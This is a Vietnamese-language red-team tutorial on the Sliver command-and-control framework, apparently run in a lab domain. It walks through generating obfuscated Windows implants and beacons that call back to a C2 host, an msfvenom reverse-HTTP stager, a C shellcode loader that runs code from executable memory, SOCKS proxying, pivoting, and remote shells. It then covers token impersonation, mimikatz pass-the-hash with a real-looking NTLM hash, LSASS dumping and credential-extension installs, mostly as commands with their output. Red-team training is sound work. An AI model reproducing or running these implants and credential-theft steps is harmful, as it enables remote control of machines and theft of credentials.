Sliver

Refer

Setup

Auto install

sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64
curl https://sliver.sh/install|sudo bash

Start silver server

systemctl start sliver
systemctl status sliver

Config authen

Connect with client

└─$ sliver                                                                       
Connecting to localhost:31337 ...

.------..------..------..------..------..------.                                                                                                                                                                                            
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |                                                                                                                                                                                            
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |                                                                                                                                                                                            
| :\/: || (__) || :\/: || ()() || :\/: || ()() |                                                                                                                                                                                            
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|                                                                                                                                                                                            
`------'`------'`------'`------'`------'`------'                                                                                                                                                                                            
                                                                                                                                                                                                                                            
All hackers gain dash
[*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df
[*] Welcome to the sliver shell, please type 'help' for options

[*] Check for updates with the 'update' command

sliver >  

Beacons and Sessions

Trong Sliver thì C2 agent được gọi là implant

Sliver hỡ trợ 2 mode implant là beacons và sessions

Tham khảo: https://sliver.sh/docs?name=Getting+Started

Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol.

Hiểu đơn giản thì beacon mode giống beacon Cobalt Strike còn session mode thì giống Metasploit

Generate session implant

sliver > generate --mtls <C2 server ip> --os windows --arch amd64 --format exe --save /tmp/shell.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 44s
[*] Implant saved to /tmp/shell.exe

Start mtls listner

sliver > mtls

[*] Starting mTLS listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name   Protocol   Port   Stage Profile 
==== ====== ========== ====== ===============
 1    mtls   tcp        8888                 

sliver >  

Tương tác với sessions

[*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                             Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== =========
 bb86e5a5   DIGITAL_ATTENTION   mtls        192.168.179.11:59818   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 22:59:29 EST 2024 (23s ago)   [ALIVE] 

sliver > use

? Select a session or beacon: SESSION  bb86e5a5  DIGITAL_ATTENTION  192.168.179.11:59818  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9)

sliver (DIGITAL_ATTENTION) > info

        Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9
              Name: DIGITAL_ATTENTION
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5468
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59818
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)
      Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago)

Exit

sliver (DIGITAL_ATTENTION) > background

[*] Background ...

sliver > sessions

 ID         Name                Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Message                              Health  
========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= =========
 75da56b4   DIGITAL_ATTENTION   mtls        192.168.179.11:59853   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:03:57 EST 2024 (1m4s ago)   [ALIVE] 

sliver > sessions -k 75da56b4

[!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST


sliver >

Generate beacon implant

sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 29s
[*] Implant saved to /tmp/beacon.exe

Tương tác với beacons

[*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST

sliver > beacons

 ID         Name                Tasks   Transport   Remote Address         Hostname           Username                  Operating System   Locale   Last Check-In                           Next Check-In                        
========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ======================================
 be2fe170   DETERMINED_JUNKET   0/0     mtls        192.168.179.11:59885   DomainController   ENDY-COMP\administrator   windows/amd64      en-US    Sat Dec 21 23:10:47 EST 2024 (3s ago)   Sat Dec 21 23:10:52 EST 2024 (in 2s)                                                                                                                                                                                                      

sliver > use

? Select a session or beacon: BEACON  be2fe170  DETERMINED_JUNKET  192.168.179.11:59885  DomainController  ENDY-COMP\administrator  windows/amd64
[*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99)

sliver (DETERMINED_JUNKET) > info

         Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99
              Name: DETERMINED_JUNKET
          Hostname: DomainController
              UUID: 6d114d56-3846-0706-4bad-06bcafa25169
          Username: ENDY-COMP\administrator
               UID: S-1-5-21-3689512688-2841538555-566222747-500
               GID: S-1-5-21-3689512688-2841538555-566222747-513
               PID: 5484
                OS: windows
           Version: Server 2016 build 14393 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: mtls://192.168.179.132:8888
    Remote Address: 192.168.179.11:59885
         Proxy URL: 
          Interval: 5s
            Jitter: 3s
     First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago)
      Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago)
      Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago)

sliver (DETERMINED_JUNKET) > 

Check tasks

sliver (DETERMINED_JUNKET) > tasks

 ID         State       Message Type   Created                         Sent                            Completed                     
========== =========== ============== =============================== =============================== ===============================
 2b2aec2f   completed   Screenshot     Sat, 21 Dec 2024 23:12:08 EST   Sat, 21 Dec 2024 23:12:12 EST   Sat, 21 Dec 2024 23:12:12 EST 
 9ecc207b   completed   Execute        Sat, 21 Dec 2024 23:12:04 EST   Sat, 21 Dec 2024 23:12:06 EST   Sat, 21 Dec 2024 23:12:06 EST 

Đổi config beacons

sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s

[*] Tasked beacon DETERMINED_JUNKET (428cea99)

[+] DETERMINED_JUNKET completed task 428cea99

[*] Reconfigured beacon  

Chuyển beacons thành sessions

sliver (DETERMINED_JUNKET) > interactive 

[*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888
[*] Tasked beacon DETERMINED_JUNKET (51e7cb02)

[*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST

sliver (DETERMINED_JUNKET) >

Có thể chuyển sesion với protocol khác

sliver > interactive --help

Task a beacon to open an interactive session (Beacon only)

Usage:
======
  interactive [flags]

Flags:
======
  -d, --delay      string    delay opening the session (after checkin) for a given period of time (default: 0s)
  -n, --dns        string    dns connection strings
  -h, --help                 display help
  -b, --http       string    http(s) connection strings
  -m, --mtls       string    mtls connection strings
  -p, --named-pipe string    namedpipe connection strings
  -i, --tcp-pivot  string    tcppivot connection strings
  -t, --timeout    int       command timeout in seconds (default: 60)
  -g, --wg         string    wg connection strings
  • Beacons thì có thể chuyển thành sesson như session thì không thể chuyển thành beacon

  • Một cố command như shellportfwd thì chỉ hoạt động với sessions

Profiles

Tạo profiles để generate cho nhanh

Profiles session

sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default

[*] Saved new implant profile session_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/shell.exe session_win_default

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 24s
[*] Implant saved to /tmp/shell.exe

sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

Profile beacon

sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default

[*] Saved new implant profile (beacon) beacon_win_default

sliver > profiles 

 Profile Name          Implant Type   Platform        Command & Control                 Debug   Format       Obfuscation   Limitations 
===================== ============== =============== ================================= ======= ============ ============= =============
 beacon_win_default    beacon         windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   
 session_win_default   session        windows/amd64   [1] mtls://192.168.179.132:8888   false   EXECUTABLE   enabled                   

sliver > profiles generate --save /tmp/beacon.exe beacon_win_default

[*] Generating new windows/amd64 beacon implant binary (5s)
[*] Symbol obfuscation is enabled
[*] Build completed in 26s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/beacon.exe

Get danh sách các implants

sliver > implants 

 Name                Implant Type   Template   OS/Arch             Format   Command & Control                 Debug 
=================== ============== ========== =============== ============ ================================= =======
 DETERMINED_JUNKET   beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 DIGITAL_ATTENTION   session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 EASY_BROOM          session        sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 FRESH_AUDIENCE      beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.179.132:8888   false 
 TALL_POST           beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://192.168.122.111:8888   false 

Xóa implants

sliver > implants rm TALL_POST

? Remove 'TALL_POST' build? Yes

Stager

Tạo stager đầu tiên cần tạo 1 profile với format shellcode

sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode

[*] Saved new implant profile win-shellcode

Tạo listener

sliver > https

[*] Starting HTTPS :443 listener ...

[*] Successfully started job #1

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile 
==== ======= ========== ====== ===============
 1    https   tcp        443                  

Tạo stage-listener cho profile để delivery payload. Nhớ thêm prepend-size

sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size

[*] No builds found for profile win-shellcode, generating a new one
[*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE
[*] Job 8 (http) started

sliver > jobs

 ID   Name    Protocol   Port   Stage Profile                                       
==== ======= ========== ====== =====================================================
 7    https   tcp        443                                                        
 8    http    tcp        1234   win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE) 

Gen payload để load stager bằng msfvenom. Lưu ý dùng shell custom mới ăn còn dùng meterpreter thì không ăn

msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exe

Hoặc có thể gen ra format c rồi dùng code sau để load

#include "windows.h"

int main()
{
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
    "\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
    ...
    "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41"
    "\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff"
    "\xd5";


    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, shellcode, sizeof shellcode);
    ((void(*)())exec)();

    return 0;
}

Compile

x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.c

Sau khi kích file thì phải đợi 5-10s sau mới có sessions về (đôi khi nó về sesions nhưng không có alert nên cứ check sessions cho chắc)

Execute Assembly

Sliver cho phép thực thi .net assembly tương tự như Cobalt Strike.

sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe

[*] Output:


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.2.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 


ERROR: Error running command ""


[*] Completed collection in 0.006 seconds

Socks and Portfwd

Socks5

sliver (BROKEN_LIQUID) > socks5 --help

In-band SOCKS5 Proxy

Usage:
======
  socks5 [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    router timeout in seconds (default: 60)

Sub Commands:
=============
  start  Start an in-band SOCKS5 proxy
  stop   Stop a SOCKS5 proxy
  
sliver (BROKEN_LIQUID) > socks5 start

[*] Started SOCKS5 127.0.0.1 1081  
⚠  In-band SOCKS proxies can be a little unstable depending on protocol

sliver (BROKEN_LIQUID) > socks5 

 ID   Session ID                             Bind Address     Username   Passwords 
==== ====================================== ================ ========== ===========
  1   762b70da-f0db-4d20-ada9-a155f4a1ce7d   127.0.0.1:1081                        

sliver (BROKEN_LIQUID) > socks5 stop -i 1

[*] Removed socks5

sliver (BROKEN_LIQUID) >  

Theo cảm nhận của mình thì độ stable không ngon bằng Cobalt Strike lắm

Portfwd

sliver (SPICY_JAW) > portfwd --help 

In-band TCP port forwarding

Usage:
======
  portfwd [flags]

Flags:
======
  -h, --help           display help
  -t, --timeout int    command timeout in seconds (default: 60)

Sub Commands:
=============
  add  Create a new port forwarding tunnel
  rm   Remove a port forwarding tunnel

sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445

[*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445

Bind port 9999 tại local với port 445 tại 192.168.17.138

Remove portfw

sliver (SPICY_JAW) > portfwd

 ID   Session ID                             Bind Address     Remote Address     
==== ====================================== ================ ====================
  1   b0653816-faa9-4975-b28b-92165d4a6085   127.0.0.1:9999   192.168.17.138:445 

sliver (SPICY_JAW) > portfwd rm -i 1

[*] Removed portfwd

Pivot

Pivot chỉ dùng được với sesions còn beacons thì không

TCP Pivot

Tạo tcp pivots trên sesons

sliver (BROKEN_LIQUID) > pivots tcp 

[*] Started tcp pivot listener :9898 with id 1

sliver (BROKEN_LIQUID) > pivots

 ID   Protocol   Bind Address   Number Of Pivots 
==== ========== ============== ==================
  1   TCP        :9898                         0 

sliver (BROKEN_LIQUID) >

Gen shell để call về C2

sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 30s
[*] Implant saved to /tmp/pivot.exe

Với ip ở đây sẽ là IP của sessions mà có thể giao tiếp với target.

Up hàng lên máy target rồi kích hoạt ta sẽ có được sesions qua đường tunnel TCP

SMB Pivot

Start namepipe trên session

sliver > use 982155fd

[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)

sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar

[*] Started named pipe pivot listener \\.\pipe\foobar with id 2

Gen shell để call về C2

sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 34s
? Overwrite existing file? Yes
[*] Implant saved to /tmp/pivot.exe

Tương tự trên thì IP cũng là IP của sessions mà có thể giao tiếp với target.

Kết quả:

Stop pivot

sliver (BROKEN_LIQUID) > pivots stop -i 1

[*] Stopped pivot listener

Operator

Rename sessions

sliver > sessions

 ID         Name               Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   BEAUTIFUL_REPORT   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 22:50:55 EST 2025 (2s ago)   [ALIVE] 

sliver > use 0456ae36

[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)

sliver (BEAUTIFUL_REPORT) > rename -n WinA

[*] Renamed implant to WinA

sliver > sessions 

 ID         Name   Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   WinA   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 23:06:52 EST 2025 (1s ago)   [ALIVE] 

sliver >  

Upload / Download

sliver (WinA) > download desktop.ini /home/kali/test

[*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test

sliver (WinA) > upload /home/kali/test test

[*] Wrote file to C:\Users\Administrator\Desktop\test

Shell

sliver (BEAUTIFUL_REPORT) > shell 

? This action is bad OPSEC, are you an adult? Yes

[*] Wait approximately 10 seconds after exit, and press <enter> to continue
[*] Opening shell tunnel (EOF to exit) ...

[*] Started remote shell with pid 2844

PS C:\Users\Administrator\Desktop> Shell exited

sliver (BEAUTIFUL_REPORT) >  

Nhấn Ctrl+D để exit

Execute có output

sliver (WinA) > execute -o whoami /all

[*] Output:

USER INFORMATION
----------------

User Name          SID                                        
================== ===========================================
wina\administrator S-1-5-21-2122276757-511757396-437061769-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
LOCAL                                                         Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                                

Make token

sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\ (0 items, 0 B)
================================


sliver (WinA) > make-token -u userB -p Password123 -d .


[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw-  123.txt  0 B  Sat Jan 04 21:48:13 -0800 2025


sliver (WinA) >

Dùng rev2self để clear token

Pass the hash

sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe

[*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe

sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden"
user    : userB
domain  : .
program : powershell -w hidden
impers. : no
NTLM    : 58a478135a93ac3bf058a5ea0e8fdb71
  |  PID  3048
  |  TID  1900
  |  LSA Process is now R/W
  |  LUID 0 ; 2745069 (00000000:0029e2ed)
  \_ msv1_0   - data copy @ 000001E1308E1CF0 : OK !
  \_ kerberos - data copy @ 000001E12FD0DB98
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001E12FD3A208 (32) -> null

mimikatz(commandline) # exit
Bye!

Dump process

sliver (WinA) > procdump --pid 672 --save lsass.dmp

[*] Process dump stored in: lsass.dmp

minidump lsa

┌──(kali㉿kali)-[~]
└─$ pypykatz lsa minidump lsass.dmp
INFO:pypykatz:Parsing file lsass.dmp
FILE: ======== lsass.dmp =======
== LogonSession ==
authentication_id 113459 (1bb33)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server 
logon_time 2025-01-05T07:49:38.007112+00:00
sid S-1-5-7
luid 113459
....

Side load

sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit"

[*] Output:

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # exit
Bye!

Amory

amory là extension package manager của sliver, cho phép ta download thêm package

sliver > armory

Install package

sliver > armory install windows-credentials

[*] Installing extension 'coff-loader' (v1.0.14) ... done!
[*] Installing extension 'nanodump' (v0.0.5) ... done!
[*] Installing extension 'credman' (v1.0.7) ... done!
[*] Installing extension 'chromiumkeydump' (v0.0.2) ... done!
[*] Installing extension 'handlekatz' (v0.0.1) ... done!
[*] Installing extension 'mimikatz' (v0.0.1) ... done!

Last updated